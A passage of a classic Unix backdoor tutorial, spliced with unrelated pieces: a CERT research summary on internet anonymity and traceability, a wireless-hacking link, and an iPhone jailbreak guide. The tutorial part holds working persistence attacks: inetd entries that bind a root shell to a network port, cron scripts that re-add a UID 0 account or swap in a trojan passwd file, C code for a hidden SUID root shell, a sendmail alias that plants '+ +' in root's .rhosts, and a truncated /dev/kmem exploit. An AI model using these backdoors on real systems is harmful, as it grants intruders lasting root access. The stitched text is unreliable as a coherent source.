Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine which port it should associate the program name with. Field (2) tells inetd which type of socket connection the daemon will expect: TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field, which is either of the two transport protocols, TCP or UDP. Field (4) specifies whether the daemon is iterative or concurrent. A 'wait' flag indicates that the server will process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or, more importantly, the UID) that the daemon is run as. Field (6) is the program to run when a connection arrives, and (7) is the actual command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally. This is done with an 'internal' flag in fields (6) and (7).

So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it with something else: a program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd file, etc. For the insinuation-impaired, try this:



Open /etc/inetd.conf in an available editor. Find the line that reads:





daytime stream tcp nowait root internal



and change it to:



daytime stream tcp nowait root /bin/sh sh -i



You now need to make /etc/inetd reread the config file. It is up to you how you want to do this. You can kill and restart the process (kill -9 <pid>, then /usr/sbin/inetd or /usr/etc/inetd), which will interrupt ALL network connections (so it is a good idea to do this during off-peak hours).
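A less disruptive option on most systems: inetd implementations generally reread inetd.conf when sent SIGHUP, leaving existing connections alone. A sketch of finding the PID and signaling it (the ps output line below is canned so the extraction can be demonstrated; on a live system you would feed the pipeline `ps -e` instead):

```shell
# Canned ps-style line standing in for real `ps -e` output.
sample="  143 ?        00:00:00 inetd"
# Pull out the PID: first field of the line mentioning inetd.
pid=`echo "$sample" | awk '/inetd/ {print $1}'`
# On a live system you would now run: kill -HUP "$pid"
echo "would run: kill -HUP $pid"
```

Whether HUP is honored (and whether the binary lives in /usr/sbin or /usr/etc) varies by flavor, so check the local inetd man page first.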



[5] An alternative to compromising a well-known service would be to install a new one that runs a program of your choice. One simple solution is to set up a shell that runs similarly to the above backdoor. You need to make sure the entry appears in /etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:



(1)    (2)/(3)   (4)
smtp   25/tcp    mail



Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name

associated with the service. For instance, add this line to /etc/services:



evil 22/tcp evil



and this line to /etc/inetd.conf:



evil stream tcp nowait root /bin/sh sh -i



Restart inetd as before.



Note: potentially, these are VERY powerful backdoors. They not only offer local re-entry from any account on the system, they offer re-entry from *any* account on *any* computer on the Internet.



[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this backdoor may or may not last. /var/spool/cron/crontabs/root is where root's crontab is usually located. Here you have several options. I will list only a few, as cron-based backdoors are limited only by your imagination. Cron is the clock daemon: a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove, or view your crontab entries. It is just as easy to manually edit the /var/spool/cron/crontabs/root file as it is to use crontab. A crontab entry has six fields:



(1)  (2)  (3)  (4)  (5)  (6)
0    0    *    *    1    /usr/bin/updatedb



Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31), month of the year (1-12), and day of the week (0-6). Field (6) is the command (or shell script) to execute. The above entry runs /usr/bin/updatedb at midnight on Mondays. To exploit cron, simply add an entry to /var/spool/cron/crontabs/root. For example, you can have a cron job that runs daily, looks in the /etc/passwd file for the UID 0 account we previously added, re-adds it if it is missing, and does nothing otherwise (it may not be a bad idea to actually *insert* this shell code into an already-installed crontab entry's shell script, to further obfuscate your shady intentions). Add this line to /var/spool/cron/crontabs/root:



0 0 * * * /usr/bin/trojancode



This is the shell script:



#!/bin/csh
# Is our eviluser still on the system? Let's make sure he is.
# daemon9@netcom.com

set evilflag = (`grep eviluser /etc/passwd`)

if($#evilflag == 0) then # Is he there?
    set linecount = `wc -l /etc/passwd`
    cd # Do this at home.
    cp /etc/passwd ./temppass # Safety first.
    @ linecount[1] /= 2
    @ linecount[1] += 1 # we only want 2 temp files
    split -$linecount[1] ./temppass # passwd string optional
    echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
    cat ./xab >> ./xaa
    mv ./xaa /etc/passwd
    chmod 644 /etc/passwd # or whatever it was beforehand
    rm ./xa* ./temppass
    echo Done...
endif



[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this you need a copy of the /etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root account with a passwd of your choosing. We run a cron job that will, every morning at 2:29am (or every other morning), save a copy of the real /etc/passwd file and install this trojan one as the real /etc/passwd file for one minute (synchronize watches!). Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later everything would be OK. Add this line to root's crontab file:





29 2 * * * /usr/bin/sneakysneaky_passwd



make sure this exists:



#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky



and this is the simple shell script:



#!/bin/csh
# Install trojan /etc/passwd file for one minute
# daemon9@netcom.com

cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd



[8] Compiled code trojan. Simple idea: instead of a shell script, have some nice C code to obfuscate the effects. Here it is. Make sure it runs as root. Name it something innocuous. Hide it well.



/* A little trojan to create an SUID root shell, if the proper argument is
   given. C code, rather than shell, to hide its obvious effects. */
/* daemon9@netcom.com */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define KEYWORD "industry3"
#define BUFFERSIZE 10

int main(argc, argv)
int argc;
char *argv[];{

    int i=0;

    if(argv[1]){ /* we've got an argument, is it the keyword? */
        if(!(strcmp(KEYWORD,argv[1]))){
            /* This is the trojan part. */
            system("cp /bin/csh /bin/.swp121");
            system("chown root /bin/.swp121");
            system("chmod 4755 /bin/.swp121");
        }
    }
    /* Put your possibly system-specific trojan messages here */
    /* Let's look like we're doing something... */
    printf("Synchronizing bitmap image records.");
    /* system("ls -alR / >& /dev/null > /dev/null&"); */
    for(;i<10;i++){
        fprintf(stderr,".");
        sleep(1);
    }
    printf("\nDone.\n");
    return(0);
} /* End main */



[9] The sendmail aliases file. The sendmail aliases file allows mail sent to a particular username to either expand to several users or be piped to a program. The best known of these is the uudecode alias trojan. Simply add the line:



"decode: "|/usr/bin/uudecode"



to the /etc/aliases file. Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.



#!/bin/csh
# Create our .rhosts file. Note this will output to stdout.

echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts



Next, telnet to the desired site on port 25. Simply fakemail to decode, using as the message body the uuencoded version of the .rhosts file. For a one-liner (not faked, however) do this:

%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com



You can be as creative as you wish in this case. You can set up an alias that, when mailed to, will run a program of your choosing. Many of the previous scripts and methods can be employed here.







The Covert



[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as Tripwire. The idea is simple: insert trojan code in the source of a commonly used program. Some of the most useful programs to us in this case are su, login, and passwd, because they already run SUID root and need no permission modification. Below are some general examples of what you would want to do, after obtaining the correct source code for the particular flavor of UNIX you are backdooring. (Note: this may not always be possible, as some UNIX vendors are not so generous with their source code.) Since the code is very lengthy and differs across flavors, I will just include basic pseudo-code:



get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...



Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
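The pseudo-code above, sketched as a runnable shell function (the flag value "MAGIC" and the echoed actions are placeholders for whatever the real backdoored binary would do):

```shell
# Placeholder logic mirroring the pseudo-code: a hardcoded flag bypasses
# normal validation; anything else falls through to the usual checks.
check_input() {
    if [ "$1" = "MAGIC" ]; then
        echo "trojan"      # stands in for: spawn the evil trojan
    elif [ -n "$1" ]; then
        echo "normal"      # stands in for: continue normal processing
    else
        echo "error: no input" >&2
        return 1
    fi
}
check_input MAGIC
check_input someuser
```

In the real attack this branch would be buried inside su, login, or passwd in C, which is why a source diff (or an integrity checker like Tripwire) is the only reliable way to spot it.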







The Esoteric



[11] /dev/kmem exploit. /dev/kmem represents the virtual memory of the system. Since the kernel keeps its parameters in memory, it is possible to modify the memory of the machine to change the UID of your processes. Doing so requires that /dev/kmem have read/write permission. The following steps are executed: open the /dev/kmem device, seek to your page in memory, overwrite the UID of your current process, then spawn a csh, which will inherit this UID. The following program does just that.



/* If /dev/kmem is readable and writable, this program will change the user's
   UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
   with some modifications by daemon9@netcom.com */

#include
#include
#include
#include
#include
#include
#include

#define KEYWORD "nomenclature1"

struct user userpage;
long address(), userlocation;

int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{

int count, fd;

Protocols for Anonymity and Traceability Tradeoffs

A project at the CERT Institute





Problem Addressed
Existing Internet protocols were never engineered for today’s Internet, where the trustworthiness of users cannot be assumed and where high-stakes, mission-critical applications increasingly reside. Malicious users exploit the severe weakness in existing Internet protocols to achieve anonymity and use that anonymity as a safe haven from which to launch repeated attacks on their victims. Hence, service providers and other victims of cyber attack want and need traceability for accountability, redress, and deterrence. Unfortunately, our current track-and-trace capability is extremely limited by the existing protocol and infrastructure design and requires a major re-engineering effort from both technical and policy perspectives. This is discussed in an SEI special report sponsored by the U.S. State Department [1]. On the other hand, Internet users, both individuals and organizations, often want or need anonymity for a variety of legitimate reasons. The engineering challenge is to balance the apparently conflicting needs of privacy and security.
Research Approach
Traceability and anonymity are attributes that are central to the security and survivability of mission-critical systems. We believe that principled, fine-grained tradeoffs between traceability and anonymity are pivotal to the future viability of the Internet. However, such tradeoffs are rarely explicitly made, the current capability to make such tradeoffs is extremely limited, and the tradeoffs between these attributes have occurred on an ad hoc basis at best. The LEVANT (Levels of Anonymity and Traceability) project is developing the foundations for a disciplined engineering design of Internet protocols in the context of key policy issues. This will allow dynamic, fine-grained tradeoffs between traceability and anonymity to be made on the basis of specific mission requirements. We see this project as a first step toward the development of a discipline of Internet engineering, which would translate traditional design and engineering processes, such as thorough requirements gathering and attribute tradeoff analyses, into the unique context of the Internet environment and its associated security and survivability risks [2].

In any Internet transaction, trust ultimately depends not on IP addresses but on particular relationships among individuals and their roles within organizations and groups (which may be economic, political, educational, or social). Trust cannot be established while maintaining total anonymity of the actors involved. It goes without saying that there is a great need for privacy on the Internet, and it must be carefully guarded. However, trust and privacy tradeoffs are a normal part of human social, political, and economic interactions, and such tradeoffs are routinely resolved in a number of venues, for example in the marketplace. Consider the telephone system, in particular the caller identification (caller ID) feature, which displays the phone number, and often the name, associated with incoming calls. Caller ID is a feature for which many customers are willing to pay extra in return for the privacy benefits associated with having some idea of who’s calling before answering a call. However, callers are sometimes given the option of being anonymous (i.e., not identifiable by the caller ID feature) by default or on a call-by-call basis. To more fully protect their privacy, caller ID customers can choose to block all incoming calls from anonymous callers. The anonymous caller is notified of this fact by an automated message. For callers who pre-arrange with their phone companies to be anonymous by default, the only way to complete a call is to enter a key sequence to remove the anonymity for that particular call and to redial. Customers who achieve anonymity on a call-by-call basis (by entering a specific key sequence) can choose to redial without entering the key sequence that denotes anonymity. This choice is a form of negotiation between the caller and the intended recipient of the call, and it is a tradeoff between anonymity and trust that is supported by the technology of caller ID and the marketplace. 
There is no government mandate that all calls must be anonymous or that no calls may be anonymous. The individual caller chooses whether or not to relinquish anonymity (or some degree of privacy) in exchange for the perceived value of completing the call by increasing the degree of trust as perceived by the recipient.

One can envision next-generation Internet protocols supporting this kind of marketplace negotiation of trust versus privacy tradeoffs. For example, we are exploring the possibility of third-party certifying authorities that would serve as brokers of trust. These certifying authorities would provide mechanisms whereby packets would be cryptographically signed with very fine-grained authentication credentials of the sender. This is not the same as having an individual digitally sign a message, as a digitally signed message may be too coarse grained for a particular scenario and may reveal too much. Another capability might be the escrowing, by these certifying authorities, of complete identifying information for a specified period of time, to be revealed in the event that one or more of a user’s packets have been identified as participating in a confirmed attack.

We are investigating the fundamental concepts necessary to inform the design of Internet protocols that support dynamic, fine-grained tradeoffs between traceability and anonymity in a manner that satisfies the security, survivability, and anonymity (or privacy) requirements of the protocols’ users. Our goal is to provide an exemplar for the application of principled software and systems engineering practices in the unique context of the Internet. A key part of this process is our exploration of alternative designs for new Internet protocols that allow the originator and the recipient of an Internet transaction or service to negotiate what levels of traceability and anonymity to accept. In order to design and evaluate Internet protocols that support negotiated tradeoffs between anonymity and traceability, we need some way to quantify and measure levels of anonymity and traceability. The concept of k-anonymity provides some useful theoretical underpinnings.
Meaning of k-anonymity
We say that a user is k-anonymous in a network context if the user is only traceable to a set of measure k, where this could mean either a set of size k or a set of radius k in the topological sense of the network (as shown in Figure 1). Our goal is to explore the design of Internet protocols that assure traceability, but only to a group of k actors. The concept of k-anonymity was first defined by Pierangela Samarati [3]. Samarati showed how generalization and suppression of data can be used to enforce k-anonymity in private databases (such as those containing medical and driver’s license data) thereby reducing privacy loss. This concept was later reiterated by Latanya Sweeney in the context of medical databases [4].
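As a rough formalization of the size reading (our own notation, not taken from the cited papers):

```latex
% A(u, T): the anonymity set of user u given an observer's trace T,
% i.e., all users the observer cannot distinguish from u.
% The radius reading replaces |A(u,T)| with the network radius of A(u,T).
\[
  u \text{ is } k\text{-anonymous given } T
  \iff
  \bigl|\, A(u, T) \,\bigr| \;\ge\; k
\]
```

Larger k thus means weaker traceability: the observer can narrow the source of a transaction down only to a group of at least k candidate actors.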

Figure 1: Examples of k-anonymity

User and Service Provider Goals
Effective anonymity and traceability tradeoffs require an in-depth understanding of the specific goals of users and service providers. User goals may differ on a case-by-case basis. Below are some examples:

* User may want to hide its location and identity entirely (large k).
* User may want to hide its location somewhat (e.g., reveal the city, but not street address).
* User may want to hide its location but not its identity.

Similarly, service providers may have different goals and/or requirements. Below are some examples:

* Provider may want to know both user’s location and identity.
* Provider may want to know user’s location somewhat.
* Provider may want to know user’s identity but does not care about user’s location.

It is important to note that the value of anonymity and traceability tradeoffs extends well beyond the relationships among individual users and service providers. The ability to explicitly make such tradeoffs can provide essential support for organizations engaged in a complex mix of collaborative and competitive (adversarial) relationships. Consider the scenario below.
LEVANT Scenario
Assume that a number of organizations collaborate to build a shared (highly distributed) knowledge base that is more comprehensive and of higher quality than each could build on its own. This knowledge base provides a significant competitive advantage for the collaborators over other organizations that are not participating in this effort.

Although the participating organizations collaborate on some projects, they are competitors in other areas. Each may use the knowledge base to further its own strategies, tactical decisions, and so forth. Hence, each participating organization wants traceability in the event that the availability, integrity, or confidentiality of the knowledge base is compromised or threatened, and to ensure that no external organizations get access to the data. Yet, each organization wants its own members to be able to query the knowledge base without revealing to the other collaborators (or, of course, to any outsider) the source of any query being made by that organization. LEVANT technology would provide network-level protocol support for the traceability and anonymity tradeoffs that the collaborating organizations agree upon, helping ensure the success of their cooperative and individual missions.

Some additional information on the LEVANT project is available in a summary report on SEI independent research and development projects [5].
Benefits
In this era of open, highly distributed, complex systems, vulnerabilities abound and adequate security, using defensive measures alone, can never be guaranteed. As with all other aspects of crime and conflict, deterrence plays an essential role in protecting society. Hence, the ability to track and trace attackers is crucial, because in an environment of total anonymity, deterrence is impossible, and an attacker can endlessly experiment with countless attack strategies and techniques until success is achieved. The ability to accurately and precisely assign responsibility for cyber attacks to entities or individuals (or to interrupt attacks in progress) would be of critical value. It would allow society’s legal, political, and economic mechanisms to work both domestically and internationally to deter future attacks and motivate evolutionary improvements in relevant laws, treaties, policies, and engineering technology. On the other hand, there are many legal, political, economic, and social contexts in which some protection of anonymity or privacy is essential. Without some degree of anonymity or privacy, individuals or entities whose cooperation is vitally needed may not fully participate (or participate at all) in the use or operation of systems that support the critical functions of the global information society.

Hence, traceability and anonymity are attributes that are central to the security and survivability of mission-critical systems. The LEVANT project is exploring the essential engineering and policy issues associated with traceability and anonymity tradeoffs. A primary objective is to design Internet protocols that allow these tradeoffs to be dynamic, fine grained, and based on the specific mission needs of the protocols’ users. An ultimate benefit of these new Internet protocols will be dramatically improved security and traceability for mission-critical applications and infrastructures, along with strong privacy and anonymity protection for legitimate users who act either as individuals or within specific organizational roles.
2006 Accomplishments
In FY2006, we continued our work towards establishing a solid theoretical foundation on which to base principled engineering tradeoffs between traceability and anonymity. Our research has explored the range of engineering requirements for the design of Internet protocols that support traceability and anonymity attribute tradeoffs and the negotiations that are needed to set the desired level of each attribute. We’ve generated and analyzed several LEVANT protocol scenarios of use that include specific user requirements for anonymity and traceability that must be satisfied for particular applications, systems, and missions. We’ve also investigated the underlying security and survivability themes in this research, in particular with respect to the engineering tradeoffs being explored for protocol design. Our research has also examined policy issues relating to the design and use of protocols that support negotiated levels of anonymity and traceability for individual actors and for organizations.
2007 Plans
In FY2007, we plan to complete an SEI technical report on our LEVANT project research. One or more papers derived from this technical report are also planned, along with the submission of funding proposals seeking long-term support for the LEVANT project.

a good link for wireless hacking

Wireless hacking explained, step by step.


http://www.cs.wright.edu/~pmateti/InternetSecurity/Lectures/WirelessHacks/Mateti-WirelessHacks.htm

Jailbreaking iPhone 3.1.3 IPSW with PwnageTool 3.1.5

Intipadi.com – With the PwnageTool app now updated for Mac OS X users, most of the iPhone Dev Team’s set of jailbreak and unlock tools now supports iPhone firmware 3.1.3, the latest update from Apple. Although Softpedia does not condone jailbreaking, those who do wish to employ these tools and hack their iPhones should at least follow a few guidelines, so they don’t brick their devices.

“If you really truly feel that you need to update, [PwnageTool 3.1.5] creates a custom 3.1.3 IPSW for you to restore to on your iPhone 2G, iPhone 3G, iPhone 3GS with early bootrom, iPod touch 1G, and iPod touch 2G with early bootrom,” the iPhone Dev Team says in its recent blog post.

“If you don’t know if you have an early bootrom or not, please avoid updating until you learn more [...] If you have an iPhone 3GS, PwnageTool works if you’re currently at version 3.1.2 or below (down to 3.0). [...] Don’t use PwnageTool on the iPhone 3GS if you’re at 3.1.3, it just won’t work (you will need to downgrade to 3.1.2).” “Also, if you use the blacksn0w unlock (currently at baseband 05.11.07), you will need to stay at 3.1.2,” according to the infamous team of hackers.
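The Dev Team’s compatibility rules quoted above can be summarized in a small checker. This is just a sketch for illustration (the device-name strings and the `pwnage_supported` function are my own, and I’ve assumed the 3GS firmware range “3.0 to 3.1.2” covers 3.0, 3.0.1, 3.1, and 3.1.2); always defer to the Dev Team’s own guidance.

```python
# Sketch of the PwnageTool 3.1.5 compatibility rules quoted above.
# Device-name strings are informal labels, not official identifiers.

def pwnage_supported(device: str, firmware: str, early_bootrom: bool = True) -> bool:
    """Return True if PwnageTool 3.1.5 can build a custom 3.1.3 IPSW."""
    # Unconditionally supported devices.
    if device in ("iPhone 2G", "iPhone 3G", "iPod touch 1G"):
        return True
    # 3GS and touch 2G require the early bootrom.
    if device in ("iPhone 3GS", "iPod touch 2G") and not early_bootrom:
        return False
    if device == "iPhone 3GS":
        # Must currently be on 3.0-3.1.2; a device already on 3.1.3
        # has to be downgraded to 3.1.2 first.
        return firmware in ("3.0", "3.0.1", "3.1", "3.1.2")
    if device == "iPod touch 2G":
        return True
    return False


print(pwnage_supported("iPhone 3GS", "3.1.3"))  # False: downgrade to 3.1.2 first
```

Note that this only captures the jailbreak side; as the quote says, blacksn0w unlockers on baseband 05.11.07 need to stay on 3.1.2 regardless.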

With that out of the way, the steps below should ensure the proper jailbreaking of a first-generation iPhone on firmware version 3.1.3. The steps are similar for the other devices supported by PwnageTool, with a few differences. This guide doesn’t include instructions on how to unlock your device at 3.1.3. If you’re already unlocked, PwnageTool will preserve the unlock as you restore using your custom firmware IPSW bundle (it doesn’t update the phone’s baseband). If you do plan to unlock after jailbreaking, make sure there’s a wireless Internet connection you can hook up to: PwnageTool only does the jailbreak part and installs Cydia, which allows you to download BootNeuter, install it, and use it to unlock. OK, let’s move on to the actual jailbreak steps.

1 – First off, users need to download their tools:
- PwnageTool 3.1.5;
- iPhone1,1_3.1.3_7E18_Restore.ipsw.
(Sorry, our policy doesn’t allow download links for such files; Google is your friend here.)
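Since you’re fetching the IPSW from an untrusted source, it’s worth a quick sanity check before feeding it to PwnageTool. IPSW files are ZIP archives, so a truncated or corrupt download is easy to catch. The sketch below is a hypothetical helper (the path in the commented-out call is an assumption; adjust it to wherever you saved the file), and it prints a SHA-1 digest you can compare against a hash published by a source you trust.

```python
# Optional sanity check for a downloaded IPSW: confirm it is a
# readable ZIP archive and compute its SHA-1 for comparison against
# a trusted published hash. The file path is an assumption.

import hashlib
import zipfile


def check_ipsw(path: str) -> str:
    """Verify the file is a valid ZIP and return its SHA-1 digest."""
    if not zipfile.is_zipfile(path):
        raise ValueError(f"{path} is not a valid IPSW (ZIP) archive")
    sha1 = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            sha1.update(chunk)
    return sha1.hexdigest()


# print(check_ipsw("iPhone1,1_3.1.3_7E18_Restore.ipsw"))
```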

2 – Fire up PwnageTool and select your device (as noted above, this tutorial applies word for word only to first-generation iPhones).

3 – By default, PwnageTool will move forward in simple mode, attempting to find the iPhone 3.1.3 firmware you downloaded in step 1. If it can’t find it, you will be asked to browse your computer’s hard drive and select it yourself. Make sure it is listed exactly as the one shown in the screenshot below.

4 – After hitting the right arrow to move on to the next phase, PwnageTool will ask you if you want to continue with the procedure. Hit “yes” if you’re feeling confident that you want to jailbreak, or “no” if you decide that buying everything fair and square from the iTunes Store is your thing. By choosing “yes” you continue with the jailbreak process. PwnageTool will also ask you if you have an iPhone contract that would activate normally through iTunes, meaning you wouldn’t have to unlock afterwards. If you don’t, or if you’re not sure, hit “no,” as instructed, and click the arrow.

Note: during this step, PwnageTool may also ask you to provide a couple of extra files (bootloaders), which it needs in order to complete the jailbreak process. If you don’t have them lying around, go looking for them on the Internet as instructed by the software. They’re pretty easy to find and all you need to do is download them to your desktop. PwnageTool will then recognize them automatically and continue with the jailbreak process.

5 – This step involves some waiting time. Just sit back and wait as PwnageTool creates your custom (jailbroken) IPSW restore file. During this step, the application will require you to type in your administrator password, if that’s how your computer is set up.

6 – Before showing the “success” screen, PwnageTool will have a couple more things to say to you, as shown below. For the first dialog, choose based on the knowledge of your previous actions. Do as instructed, according to the second.

7 – For this step, you need to connect your iPhone to your computer (using the USB cable it shipped with). Hit the right-arrow button again to finish, and then hit the DFU button above. You will be shown how to enter DFU mode. Pay close attention to the steps here, as they involve some time-sensitive actions. If you don’t succeed at first, don’t worry; you can retry entering DFU mode.


8 – This is the last step. If everything has gone right up to this point, you’re minutes away from having a jailbroken iPhone. Launch iTunes (which needs to be at least version 9.0) and allow it to recognize your device. If you’ve successfully completed step 7 (DFU mode), iTunes should pop up a dialog saying it has found a phone in recovery mode, advising you to restore it. Hit “ok.” You now need to restore to the custom firmware bundle created by PwnageTool and placed on your desktop. Hold ALT (option key) and click “restore” in iTunes. The application will prompt you to select the firmware bundle you want to restore to. In this case, it will be “iPhone1,1_3.1.3_7E18_Custom_Restore.ipsw.” Select it and continue.

At this point, your new custom firmware is being installed, so all you have to do is wait for it to complete the process and reboot your phone. Depending on a number of factors (system specs, etc.), this last step may take somewhere between four and six minutes.